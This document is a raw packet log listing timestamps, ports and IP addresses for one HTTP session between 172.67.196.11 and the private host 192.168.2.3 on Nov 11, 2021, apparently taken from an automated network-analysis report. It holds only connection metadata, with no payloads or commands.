Nov 11, 2021 20:35:49.078258038 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078308105 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078336954 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078387022 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078417063 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078468084 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078499079 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078537941 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.078541994 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.078548908 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078586102 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078649044 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078680992 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078732967 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078762054 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078813076 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078825951 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.078849077 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078891993 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078916073 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.078927994 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.078968048 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079003096 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079056025 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079082966 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079130888 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.079138041 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079195976 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079246998 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079276085 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079319954 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.079329967 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079334021 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.079375029 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079411983 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079462051 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079493046 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079493999 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.079534054 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079571962 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079615116 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079655886 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079706907 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079736948 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079777956 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079809904 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079844952 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.079849958 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.079864979 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079902887 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079951048 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.079981089 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080020905 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080034971 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.080063105 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080105066 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080148935 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080199003 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080231905 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080266953 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080288887 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.080295086 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.080312967 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080344915 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080374002 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.080387115 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080420971 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080421925 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.080465078 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080472946 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.080490112 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.080492973 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.080509901 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080549955 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.080559969 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080615044 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080642939 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080684900 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080693960 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.080717087 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080737114 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.080756903 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080791950 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080833912 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080867052 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.080888033 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080919027 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.080923080 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080924034 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.080964088 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.080986023 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.080991030 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.081018925 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081054926 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.081054926 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081087112 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081135035 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081163883 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081212044 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081238985 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.081243992 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081247091 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.081285954 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.081286907 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081330061 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.081331968 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081367970 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.081372023 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081410885 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081440926 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081487894 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081516981 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081564903 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081593990 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081640959 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081660032 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.081667900 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.081671953 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.081680059 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081708908 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081756115 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081784964 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081830978 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081860065 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081907988 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081934929 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.081973076 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.081979990 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.081981897 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.082021952 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.082051039 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.082097054 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.082135916 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.082166910 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.082227945 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.083059072 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.098664045 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.098684072 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.098712921 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.098731995 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.098757982 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.098781109 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.098798037 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.098798990 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.098912954 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.098926067 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.098931074 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.098959923 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.098978043 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099006891 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099014997 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.099030018 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099056005 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099080086 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099102974 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.099103928 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099108934 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.099122047 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099149942 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099169016 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099191904 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099217892 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099226952 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.099534035 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099551916 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099580050 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099605083 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099606991 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.099626064 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099644899 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099672079 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099690914 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099694967 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.099714994 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099715948 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.099735975 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099757910 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099781990 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099800110 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099827051 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099844933 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099870920 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099889040 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099915981 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099920034 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.099926949 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.099935055 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099957943 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099977016 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.099999905 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100018978 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100047112 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100064993 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.100069046 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100092888 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100096941 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.100112915 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100136995 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100162029 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100178957 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100209951 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100212097 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.100229025 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100253105 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100263119 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.100270033 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100297928 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100317001 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.100318909 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100336075 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.100342989 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100361109 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100389004 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100435019 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100440979 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.100454092 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100476980 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100500107 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.100512028 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100529909 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100558996 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100578070 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.100581884 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100603104 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100631952 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100653887 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100671053 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100698948 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100718975 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100719929 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.100739956 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100759029 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100780964 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.100785971 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.100788116 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100806952 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100867987 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100887060 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100900888 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.100915909 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100934982 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100959063 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.100963116 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.100980997 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101006031 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101022959 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101051092 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101072073 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101102114 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101104021 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.101113081 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.101120949 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101149082 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101166010 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101195097 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101212025 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.101216078 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101233959 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101260900 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101283073 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101308107 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101327896 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.101329088 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101335049 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.101346970 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101373911 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.101377010 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101396084 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101419926 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101438999 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101466894 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101468086 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.101473093 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.101485014 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101515055 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101535082 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101558924 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101576090 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101603985 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.101604939 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101623058 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101653099 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101672888 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101679087 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.101692915 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101722002 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101739883 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101768017 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101785898 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101810932 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.101814032 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101830959 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101855040 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101875067 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101878881 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.101900101 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101921082 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101944923 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101963043 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.101964951 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.101989031 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102011919 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102025986 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.102036953 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102054119 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102078915 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102101088 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102125883 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102145910 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.102148056 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102165937 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.102173090 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102194071 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102199078 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.102216005 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102238894 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102242947 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.102248907 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.102257013 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102281094 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102298021 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102325916 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102325916 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.102332115 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.102344036 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102366924 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102385044 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102411985 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102427959 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102456093 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102456093 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.102461100 CET	49751	80	192.168.2.3	172.67.196.11
Nov 11, 2021 20:35:49.102474928 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102494001 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102519035 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102535963 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102564096 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102579117 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102606058 CET	80	49751	172.67.196.11	192.168.2.3
Nov 11, 2021 20:35:49.102622986 CET	80	49751	172.67.196.11	192.168.2.3
